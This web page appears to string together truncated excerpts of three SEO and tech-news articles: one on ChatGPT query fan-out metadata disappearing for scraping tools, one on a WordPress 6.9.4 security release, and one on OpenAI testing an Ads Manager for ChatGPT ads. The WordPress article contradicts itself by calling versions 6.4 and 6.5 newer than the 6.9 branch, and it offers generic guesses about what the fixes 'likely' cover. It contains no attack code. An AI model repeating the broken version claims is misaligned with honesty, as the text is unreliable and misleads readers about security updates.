London’s industrial timeline, one for Tokyo’s, and perhaps another for comparative economic metrics. This process is essential for accuracy. By breaking a complex request into manageable chunks, the AI can synthesize a more comprehensive and factual response. For developers and SEOs, the metadata associated with this fan-out was a goldmine. It revealed exactly what the AI was looking for, which sources it was prioritizing, and how it was structuring its internal logic to satisfy the user’s intent. The Shortcut: Leveraging Unofficial Metadata Building a robust AI tool is expensive and time-consuming. It requires official API access, rigorous data science, and an understanding of high-level architecture. However, many developers found a shortcut. By scraping or intercepting the metadata that ChatGPT’s web interface transmitted back to the client, they could access the “thinking process” of the model for free, or at a much lower cost than using official enterprise channels. This metadata often included information about which specific plugins were being called, how queries were being routed to different sub-models, and the specific search terms the AI used when browsing the web. For an SEO tool, knowing exactly what keywords an AI uses to research a topic is the equivalent of seeing a competitor’s internal strategy document. It allowed these tools to promise users an “inside look” at AI behavior—an edge that felt like magic until the source was cut off. The Fragility of the “Wrapper” Economy The disappearance of this metadata underscores a hard truth in the tech world: if you build your business on someone else’s undocumented features, you don’t actually own your product. This is often referred to as the “wrapper” problem. Many AI startups are essentially thin layers of software built on top of OpenAI, Anthropic, or Google. While these wrappers provide value through better user interfaces or niche functionality, they are entirely at the mercy of the underlying platform. When OpenAI decided to hide or remove the query fan-out metadata, it likely wasn’t an attack on third-party developers. More likely, it was a routine update to improve security, reduce latency, or clean up the code. Regardless of the intent, the result was the same: tools that relied on that specific stream of data ceased to function. This illustrates why “unofficial access” is a dangerous foundation for any enterprise-grade software. The Risks of Unofficial APIs and Scraping Using unofficial pathways to gather data from AI models presents several risks to both developers and their end-users: Unpredictability: Platforms like OpenAI can change their internal data structures at any moment without notice. Unlike an official API, there is no versioning and no “grace period” for updates. Security Concerns: Tools that intercept web traffic or use browser extensions to scrape metadata can introduce security vulnerabilities for the users who install them. Legal and Ethical Hurdles: Scraping data against a platform’s Terms of Service can lead to IP bans, legal cease-and-desist orders, and the eventual shuttering of the tool. Data Integrity: Metadata meant for internal UI rendering isn’t always accurate for data analysis. Relying on it can lead to “hallucinations” in the optimization tools themselves. The Impact on SEO and Digital Marketing For the SEO community, the loss of visibility into AI query fan-outs is a significant blow to “Generative Engine Optimization” efforts. As search shifts from a list of blue links to AI-generated summaries (like Google’s AI Overviews or SearchGPT), marketers are desperate to know how to get their content cited. The fan-out metadata was the closest thing the industry had to a “ranking factor” report for AI. Without this data, SEOs are back to a state of observational testing. We can see the output, but we can no longer see the intermediate steps the AI took to get there. This makes it harder to determine if an AI ignored a piece of content because of its technical structure, its lack of authority, or simply because the AI’s internal sub-queries didn’t happen to trigger a search that included that specific site. Moving from Shortcuts to Sustainability Despite the setback, this shift is actually a positive development for the long-term health of the AI industry. It forces a move away from “hacks” and toward sustainable, data-driven strategies. For those looking to build or use AI optimization tools, the focus should now shift to several key areas: 1. Official API Integration Stable tools must be built on official APIs. While OpenAI’s API might not reveal the exact same “fan-out” metadata that the web interface once did, it provides a consistent and legal framework for building applications. Developers who use official channels

Uncategorized

WordPress Security Release 6.9.4 Fixes Issues 6.9.2 Failed To Address via @sejournal, @martinibuster

The Critical Importance of the WordPress 6.9.4 Security Update WordPress remains the most popular content management system (CMS) in the world, powering over 40% of all websites on the internet. Because of this massive market share, it is a constant target for malicious actors. Security maintenance is a perpetual game of cat and mouse, where the WordPress Core Security Team works tirelessly to identify and patch vulnerabilities before they can be exploited at scale. The release of WordPress 6.9.4 marks a significant moment in this ongoing effort, as it specifically addresses security gaps that remained open following the previous 6.9.2 update. For website administrators, SEO professionals, and digital agencies, the release of a security-focused update is more than just a routine technical notification. It is a call to action. When a security release is issued to fix issues that a previous version failed to resolve, it indicates that the initial patch may have been incomplete or that a bypass was discovered. WordPress 6.9.4 is a mandatory maintenance release for those still running the 6.9 branch, ensuring that the vulnerabilities originally targeted in version 6.9.2 are finally and fully mitigated. Why Version 6.9.2 Fell Short In the world of software development, security patches are often complex. A vulnerability might involve a specific way that data is handled, sanitized, or escaped within the CMS core. When WordPress 6.9.2 was released, its primary objective was to close specific security loopholes. However, security is rarely a static target. Once a patch is released, security researchers and “white hat” hackers often scrutinize the fix to ensure it is robust. In the case of the issues addressed in 6.9.4, it appears that the mitigations introduced in 6.9.2 did not cover every possible attack vector. This is often referred to as an “incomplete fix.” For example, a patch might prevent a specific type of Cross-Site Scripting (XSS) attack in one area of the dashboard but fail to account for a similar execution path in another. By releasing 6.9.4, the WordPress development team is acknowledging these gaps and providing a more comprehensive shield for websites that have not yet migrated to newer major versions like 6.4 or 6.5. The Risks of Incomplete Patching The danger of an incomplete patch is that it can give administrators a false sense of security. A site owner might see that they have updated to 6.9.2 and believe their site is protected against the latest known threats. Meanwhile, attackers who have analyzed the 6.9.2 patch may have already identified the remaining vulnerabilities. This makes the 6.9.4 release essential; it effectively “plugs the leaks” that the previous version missed, hardening the environment against exploitation. Technical Overview: What is Being Fixed? While the specific technical details of security vulnerabilities are often kept partially obscured until the majority of the ecosystem has updated, the primary focus of these types of short-cycle releases generally revolves around core hardening. In the context of the 6.9.x branch, these fixes often involve critical areas such as: 1. Cross-Site Scripting (XSS) Mitigations XSS vulnerabilities allow attackers to inject malicious scripts into webpages viewed by other users. This is particularly dangerous in a CMS like WordPress, where an attacker could potentially hijack an administrator’s session, leading to a full site takeover. Version 6.9.4 focuses on refining how the core handles certain types of data input to ensure that scripts cannot be executed inadvertently. 2. Data Sanitization and Escaping One of the most common ways vulnerabilities arise is through improper data handling. If a user provides input that isn’t properly sanitized before being stored in the database or displayed on a page, it can lead to SQL injection or XSS. The 6.9.4 release includes improved logic for data escaping, ensuring that even if a malicious string is entered, it is treated as harmless text rather than executable code. 3. Strengthening the REST API The WordPress REST API is a powerful tool for developers, but it also provides a significant surface area for potential attacks. Recent security updates across all WordPress versions have focused heavily on ensuring that API endpoints are properly authenticated and that data passed through these endpoints is strictly validated. The fixes in 6.9.4 likely touch upon these interfaces to prevent unauthorized data access or modification. The Importance of Backported Security Updates One might wonder why WordPress is releasing updates for version 6.9 when much newer versions are available. This is due to the WordPress project’s commitment to “backporting” security fixes. Backporting is the practice of taking a security fix developed for the most recent version of the software and applying it to older versions that are still in significant use. Many enterprise-level websites and large-scale networks remain on older versions of WordPress (like the 6.9 branch) to maintain compatibility with legacy plugins, custom-coded themes, or specific server environments. By providing updates like 6.9.4, WordPress ensures that these users stay protected without being forced into a major version upgrade that might break their site’s functionality. This approach is a cornerstone of WordPress’s reliability in the professional sphere. SEO Implications of Unpatched Vulnerabilities From an SEO perspective, security is a top-tier priority. Search engines like Google and Bing prioritize the safety of their users. If a website is compromised due to a vulnerability that could have been fixed by an update like 6.9.4, the SEO consequences can be devastating and long-lasting. Search Engine Blacklisting If Google detects malware or suspicious scripts on your site, it may display a “This site may be hacked” warning in the search results. In more severe cases, the site may be removed from the index entirely until the issue is resolved. This leads to an immediate and total loss of organic traffic. Malicious Redirects Attackers often use vulnerabilities to implement “sneaky redirects.” When a user clicks your link in search results, they are redirected to a phishing site or a page selling illicit goods. Not only does this destroy your brand’s reputation, but search engine algorithms will quickly detect the poor user experience and drop your

Uncategorized

OpenAI tests Ads Manager as ChatGPT ad business takes shape

The Dawn of ChatGPT Advertising: OpenAI Begins Testing Ads Manager For nearly two years, the tech world has speculated on how OpenAI would eventually monetize its flagship product beyond subscription tiers. While ChatGPT Plus and Enterprise licenses provided a steady stream of revenue, the true “holy grail” of digital monetization has always been advertising. Now, that vision is becoming a reality. OpenAI has officially begun testing a dedicated Ads Manager dashboard with a select group of brand partners, signaling a major shift in how the world’s most famous AI assistant operates. As the company transitions from a research-focused entity into a full-scale digital advertising player, it faces the monumental task of challenging Google’s decades-long dominance in the search market. The introduction of an Ads Manager is the first step in building the infrastructure required to manage, scale, and optimize campaigns within a conversational interface. However, early data suggests that while the potential is vast, the road to achieving parity with traditional search engines is paved with significant challenges. What is the OpenAI Ads Manager? The new Ads Manager is a self-serve dashboard designed to give marketers a centralized hub for their ChatGPT campaigns. In the earliest stages of OpenAI’s advertising experiments, brands were largely operating in the dark. Performance data was delivered via weekly CSV files, a manual and antiquated process that is worlds apart from the real-time, high-octane environment of modern programmatic advertising. With the rollout of this dashboard, early testers can now launch, monitor, and optimize their campaigns in real time. This move brings ChatGPT’s advertising capabilities closer to the industry standards set by Meta Ads Manager and Google Ads. Marketers can see how their “sponsored responses” or suggested links are performing, allowing for immediate adjustments to creative assets, targeting, and budget allocation. By providing a formal interface, OpenAI is signaling to the market that it is ready for enterprise-level investment. It moves the conversation from “experimental sponsorships” to a “scalable ad channel.” For digital marketers, this is a pivotal moment; it marks the beginning of a new era where visibility isn’t just about ranking on page one of a search engine, but about being the recommended answer in a private, AI-driven conversation. The Entry Price: High Stakes for Early Adopters Innovation rarely comes cheap, and OpenAI is setting a high bar for those who want a seat at the table during this testing phase. According to industry reports, some early participants have been asked to commit a minimum spend of $200,000. This steep entry price serves several purposes for OpenAI. First, it ensures that the data gathered during the testing phase comes from high-quality, large-scale campaigns. By working with major brands that have significant creative and analytical resources, OpenAI can better refine its algorithm. Second, it limits the platform to sophisticated advertisers who understand the risks of early-stage tech. These “first-movers” are effectively paying for the privilege of being the first to understand how ChatGPT users interact with paid content. However, the $200,000 threshold also highlights a temporary barrier to entry for small and medium-sized businesses (SMBs). While Google and Meta built their empires on the backs of millions of small advertisers, OpenAI is currently focused on the top of the pyramid. As the platform matures and the Ads Manager becomes more automated, we can expect these entry costs to drop, eventually opening the door for the broader marketing community. Performance Comparison: ChatGPT vs. Google Search The most critical question for any advertiser is: “Does it work?” Early performance signals from the ChatGPT ad tests have been a mixed bag. Specifically, click-through rates (CTR) on ChatGPT ads are currently trailing behind those seen on traditional Google Search results. There are several logical reasons for this performance gap. Google Search is built on “commercial intent.” When a user searches for “best running shoes,” they are often in a buying mindset, making them highly susceptible to a well-placed ad. In contrast, ChatGPT is a tool used for a wide range of activities—coding, brainstorming, writing, and learning—where a purchase may not be the immediate goal. Furthermore, user behavior in a chat interface is fundamentally different. On a Search Engine Results Page (SERP), users are accustomed to scanning a list of links and clicking the most relevant one. In a conversation with an AI, the user is focused on the text of the response. If an ad feels intrusive or irrelevant to the flow of the conversation, users may ignore it or, worse, find it annoying. OpenAI’s challenge is to refine its ad delivery so that recommendations feel like a natural extension of the helpful advice the AI is already providing. Understanding the “Intent Gap” To bridge the performance gap with Google, OpenAI must master the art of contextual relevance. Traditional search relies on keywords; conversational AI relies on context. If a user is asking ChatGPT how to plan a trip to Italy, an ad for a flight aggregator or a boutique hotel in Rome is highly relevant. If the ad is for a generic travel insurance company that doesn’t fit the tone of the conversation, the CTR will naturally suffer. The Ads Manager is the tool that will eventually allow advertisers to fine-tune these contextual triggers. How Ads Work Inside a Conversational Interface The format of advertising in ChatGPT is still evolving, but it looks very different from the banners and pop-ups of the early web. Rather than traditional display ads, OpenAI is experimenting with “sponsored suggestions” and integrated citations. When a user asks a question, the AI might provide a comprehensive answer and include a “suggested next step” or a “source for more information” that is actually a paid placement. For example, if a user asks for a recipe, the AI might suggest specific branded ingredients available at a nearby retailer. The goal is to make the ad feel like a part of the utility of the tool. This approach presents a unique set of challenges for copywriters and digital strategists. In the world of AI advertising, “ad

Scroll to Top